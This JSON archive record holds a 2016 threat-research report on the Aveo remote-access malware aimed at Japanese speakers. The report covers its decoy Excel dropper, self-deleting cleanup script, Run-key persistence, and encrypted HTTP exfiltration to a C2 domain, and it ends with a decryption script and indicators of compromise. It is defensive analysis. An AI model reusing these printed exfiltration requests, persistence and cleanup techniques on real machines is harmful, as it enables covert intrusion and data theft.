{
	"id": "4bcbea2d-a549-429f-aca6-596b82838a6e",
	"created_at": "2026-04-06T00:06:53.563046Z",
	"updated_at": "2026-04-10T03:22:08.611989Z",
	"deleted_at": null,
	"sha1_hash": "4e24aeb400f525f33527951ef3317bc769c1cf5c",
	"title": "Aveo Malware Family Targets Japanese Speaking Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 486992,
	"plain_text": "Aveo Malware Family Targets Japanese Speaking Users\r\nBy Josh Grunzweig, Robert Falcone\r\nPublished: 2016-08-16 · Archived: 2026-04-05 22:46:50 UTC\r\nPalo Alto Networks has identified a malware family known as ‘Aveo’ that is being used to target Japanese speaking users.\r\nThe ‘Aveo’ malware name comes from an embedded debug string within the binary file. The Aveo malware family has close\r\nties to the previously discussed FormerFirstRAT malware family, which was also witnessed being used against Japanese\r\ntargets. Aveo is disguised as a Microsoft Excel document, and drops a decoy document upon execution. The decoy\r\ndocument in question is related to a research initiative led by the Ido Laboratory at the Saitama Institute of Technology.\r\nUpon execution, the Aveo malware accepts a number of commands, allowing attackers to take full control over the victim\r\nmachine.\r\nDeployment\r\nThe Aveo malware sample disguises itself as a Microsoft Excel document, as the icon below demonstrates. Note that the\r\nfilename of ‘malware.exe’ is simply a placeholder, as the original filename is unknown.\r\nFigure 1 Microsoft Excel icon used by Aveo malware\r\nThe executable is in fact a WinRAR self-extracting executable file, which will drop the decoy document and Aveo Trojan\r\nupon execution. The following decoy document is dropped and subsequently opened when run.\r\nFigure 2 Decoy document used with Aveo malware\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 1 of 6\n\nThis decoy document is hosted on the Ido Laboratory and contains information about a 2016 research initiative. The\r\ndocument lists participants in the 16th CAVE workshop, including names, affiliations, and email addresses of those involved.\r\nThe document, written in Japanese, as well as the filename of this document, “CAVE研究会参加者.xls”, indicates that this\r\nmalware was used to target one or more Japanese speaking individuals. Additionally, the similarities between the Aveo and\r\nFormerFirstRAT malware families, which will be discussed later in the post, further add evidence that Japanese speakers are\r\nbeing targeted.\r\nInfrastructure\r\nThe Aveo Trojan is configured to communicate with the following domain name over HTTP.\r\nsnoozetime[.]info\r\nThis domain was first registered in May 2015 to ‘jack.ondo@mail.com’. Since that time, it has since been associated with\r\nthe following three IP addresses:\r\n104.202.173[.]82\r\n107.180.36[.]179\r\n50.63.202[.]38\r\nAll IP addresses in question are located within the United States.\r\nFigure 3 PassiveTotal screenshot showing associated IP addresses with snoozetime[.]info\r\nThe WHOIS information for snoozetime[.]info lists a registrant email address of ‘jack.ondo@mail[.]com’ and a name of\r\n‘aygt5ruhrj aygt5ruhrj gerhjrt’. Pivoting off of these two pieces of information to domains that share the same yields the\r\nfollowing additional domains and email addresses.\r\nbluepaint[.]info\r\ncoinpack[.]info\r\n7b7p[.]info\r\ndonkeyhaws[.]info\r\neuropcubit[.]com\r\njhmiyh.ny@gmail[.]com\r\n844148030@qq[.]com\r\nMalware Analysis\r\nAfter running the self-extracting executable, a number of files are dropped to the file system and the following execution\r\nflow is witnessed:\r\nFigure 4 Malware execution flow\r\nWhen the mshelp32.exe executable runs, it begins by reading in the setting32.ini file, which contains the name of the decoy\r\ndocument. This information is used to build a batch script, such as the following.\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 2 of 6\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n@echo off\r\ncopy \"CAVE研究会参加者.xls\" \"C:\\Documents and\r\nSettings\\Administrator\\Desktop\\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls\" /Y\r\ndel \"CAVE研究会参加者.xls\" /F /Q\r\ndel mshelp32.exe /F /Q\r\ndel setting32.ini /F /Q\r\ndel \"C:\\Documents and\r\nSettings\\Administrator\\Desktop\\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe\"  /F\r\n/Q\r\ndel %0 /F /Q\r\nThis batch script is executed within a new process, and acts as a simple cleanup script that runs after Aveo and the decoy\r\ndocument are executed.\r\nAveo Malware Family\r\nThe Aveo malware initially runs an install routine, which will copy itself to the following location:\r\n%APPDATA%\\MMC\\MMC.exe\r\nIf for any reason the %APPDATA%\\MMC directory is unable to be created, Aveo will use %TEMP% instead of\r\n%APPDATA%.\r\nAfter the malware copies itself, it will execute MMC.exe in a new process with an argument of the original filename. When\r\nexecuted, if this single argument is provided, the malware will delete the file path provided.\r\nAfter the installation routine completes, Aveo will exfiltrate the following victim information to a remote server via HTTP.\r\nUnique victim hash\r\nIP Address\r\nMicrosoft Windows version\r\nUsername\r\nANSI code page identifier\r\nThis information is exfiltrated to the ‘snoozetime[.]info’ domain, as seen in the following example HTTP request:\r\n1\r\n2\r\n3\r\n4\r\n5\r\nGET /index.php?id=35467\u00261=ySxlp03YGm0-\r\n\u00262=yiFi6hjbFHf9UtL44RPQ\u00264=zTZh6h7bHGjiUMzn\u00265=sXcjrAmqXiyiGJWzuUQ-\u00266=yipl9g-- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nCache-Control: no-cache\r\nTo encrypt the provided data, the malware makes use of the RC4 algorithm, using a key of ‘hello’. As shown in the\r\nfollowing image, the encryption routines between Aveo and FormerFirstRAT are almost identical, with only the algorithms\r\nand keys being changed.\r\nFigure 5 Comparison of encryption function between Aveo and FormerFirstRAT\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 3 of 6\n\nIn order to decrypt the data provided via HTTP, the following code may be used:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\nimport base64\r\nfrom binascii import *\r\nfrom struct import *\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt\r\nCALG_RC4 = 0x6801\r\nCALG_MD5 = 0x8003\r\ndef decrypt(data):\r\n  md5_hasher = CryptCreateHash(CALG_MD5)\r\n  CryptHashData(md5_hasher, 'hello')\r\n  generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)\r\n  decrypted_data = CryptDecrypt(generated_key, data)\r\n  return decrypted_data\r\nfor a in 'index.php?id=35467\u00261=niBo9x/bFG4-\u00262=yi9i6hjbAmD5TNPu5A--\r\n\u00264=zTZh6h7bHGjiUMzn\u00265=sXcjrAmqXiyiGJWzuUQ-\u00266=yipl9g--'.split(\"\u0026\")[1:]:\r\n  k,v = a.split(\"=\")\r\n  decrypted = decrypt(base64.b64decode(v.replace(\"-\",\"=\")))\r\n  print \"[+] Parameter {} Decrypted: {}\".format(k, decrypted)\r\nRunning the code above yields the following results:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n[+] Parameter 1 Decrypted: e8836687\r\n[+] Parameter 2 Decrypted: 172.16.95.184\r\n[+] Parameter 4 Decrypted: 6.1.7601.2.1\r\n[+] Parameter 5 Decrypted: Josh Grunzweig\r\n[+] Parameter 6 Decrypted: 1252\r\nAfter the initial victim information is exfiltrated, the malware expects a response of ‘OK’. Afterwards, Aveo will spawn a\r\nnew thread that is responsible for handling interactive command requests received by the command and control (C2) server,\r\nas well as requests to spawn an interactive shell.\r\nAveo proceeds to set the following registry key to point towards the malware’s path, thus ensuring persistence across\r\nreboots:\r\nHKCU\\software\\microsoft\\windows\\currentversion\\run\\msnetbridge\r\nA command handler loop is then entered, where Aveo will accept commands from the remote C2. While the Aveo malware\r\nfamily awaits a response, it will perform sleep delays of randomly chosen intervals between 0 and 3276 milliseconds.\r\nShould the C2 server respond with ‘toyota’, it will set that interval to 60 seconds. Aveo accepts the following commands,\r\nshown with their associated function.\r\n1 : Execute command in interactive shell\r\n2 : Get file attributes\r\n3 : Write file\r\n4 : Read file\r\n5 : List drives\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 4 of 6\n\n6 : Execute DIR command against path\r\nThe following example request demonstrates the C2 server sending the ‘ipconfig’ command to the Aveo malware.\r\nC2 Request\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\nGET /index.php?id=35468\u00261=niBo9x/bFG4- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nCache-Control: no-cache\r\nHTTP/1.0 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 11\r\nServer: Werkzeug/0.11.10 Python/2.7.5\r\nDate: Wed, 10 Aug 2016 16:00:11 GMT\r\n\\xca89\\xb4J\\x82B?\\xa5\\x05\\xe8\r\n[Decrypted]\r\n1 ipconfig\r\nAveo Response\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nPOST /index.php?id=35469\u00261=niBo9x/bFG4- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nContent-Length: 1006\r\nCache-Control: no-cache\r\n\\xca\\x38\\x39\\xb4\\x4a\\x82\\x42\\x3f\\xa5\\x05\\xe8\\xdb\\xda\\x74\\x8b\\x79\\x39\\x46\\xf2\\x42\\x1f\\xcd\\x39\\xf3\\x65\\x1d\\xda\\x49\\x40\\x6c\\x5e\\x6e\\xab\\x7\r\n[Truncated]\r\n[Decrypted]\r\n1 ipconfig\r\nWindows IP Configuration\r\nEthernet adapter Bluetooth Network Connection:\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . :\r\n[Truncated]\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 5 of 6\n\n19\r\n20\r\n21\r\nConclusion\r\nAveo shares a number of characteristics with FormerFirstRAT, including encryption routines, code reuse, and similarities in\r\nC2 functionality. Aveo is far from the most sophisticated malware family around. As witnessed in the previously discussed\r\nFormerFirstRAT sample, this related malware family also looks to be targeting Japanese speaking users. Using a self-extracting WinRAR file, the malware drops a decoy document, a copy of the Aveo malware, and a cleanup script.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nAn AutoFocus tag has been created to track and monitor this threat\r\nWildFire classifies Aveo samples as malicious\r\nC2 domains listed in this report are blocked through Threat Prevention.\r\nIndicators of Compromise\r\nSHA256 Hashes\r\n9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2\r\n8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d\r\nC2 Domains\r\nsnoozetime[.]info\r\nRegistry Keys\r\nHKCU\\software\\microsoft\\windows\\currentversion\\run\\msnetbridge\r\nFile Paths\r\n%APPDATA%\\MMC\\MMC.exe\r\n%TEMP%\\MMC\\MMC.exe\r\nSource: http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/"
	],
	"report_names": [
		"unit42-aveo-malware-family-targets-japanese-speaking-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434013,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.pdf",
		"text": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.txt",
		"img": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.jpg"
	}
}